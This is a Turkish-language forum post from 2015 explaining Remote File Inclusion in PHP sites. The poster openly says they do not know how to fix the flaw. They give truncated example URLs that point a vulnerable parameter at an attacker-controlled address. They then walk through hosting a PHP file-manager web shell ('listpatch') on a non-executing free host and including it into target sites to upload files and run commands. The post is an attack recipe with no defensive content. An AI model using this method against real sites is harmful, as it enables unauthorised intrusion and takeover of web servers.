PDA

Orijinalini görmek için tıklayınız : Remote File Inclusion Nedir?



megatron
18.Ocak.2015, 17:24
PHP ile kodlanmış sistemlerde yapılan kodlama hataları, güvenlik açıklarına sebep olmaktadır. Bu güvenlik açıkları nedeniyle de sistem File Include ataklarına maruz kalmaktadır.
Açığın neden oluştuğu ve nasıl kapatalıcağı hakkında PHP bilmediğim için bilgi sahibi değilim.


Açıkdan örneklemek gerekirse, örnek bir açığın linki;


https://www.example.com/path_to_qnews.../attacker_url]


https://www.example.com/path_to_phpgr.../attacker_url]


https://www.example.com/PATH/admin/pl...mple.com/code]


Şekilde görüldüğü gibi bir kullanımları vardır. attacker_url veya example.com yazan yerlere kendi istediğimiz şeyleri yazarak siteye bazı şeyleri yaptırabiliyoruz. Örneğin dosya upload edebiliriz, bazı komutları çalıştırabiliriz (dizindeki dosyaları listeleme gibi) ya da uzaktan listpatch (ASP`deki FSO) çalıştırabiliriz. Asıl önemli nokta bu işte


Listpatch`i php destekleyen ama kodları compile etmeyen bir hosta atacağız. Yani kodlar attığımız hostta çalışırsa, include edeceğimiz hostta görevini görmeyecektir. https://hometown.aol.com/ buradan host alıp, PHP Listpatch`imizi içeriye atıyoruz.


https://hometown.aol.com/nickiniz/listpatch.php şeklinde hallettikten sonra, File Inc. açığı olan yerlerde çalıştırıyoruz.


Örneğin;


https://www.example.com/path_to_qnews.../attacker_url] burada id den sonraki yeri değiştiriyoruz. https://www.example.com/path_to_qnews.../listpatch.php şeklinde linki browser`a yazıp çalıştırdığımızda, sanki o siteye listpatch yedirmişiz gibi işlem yapabiliyoruz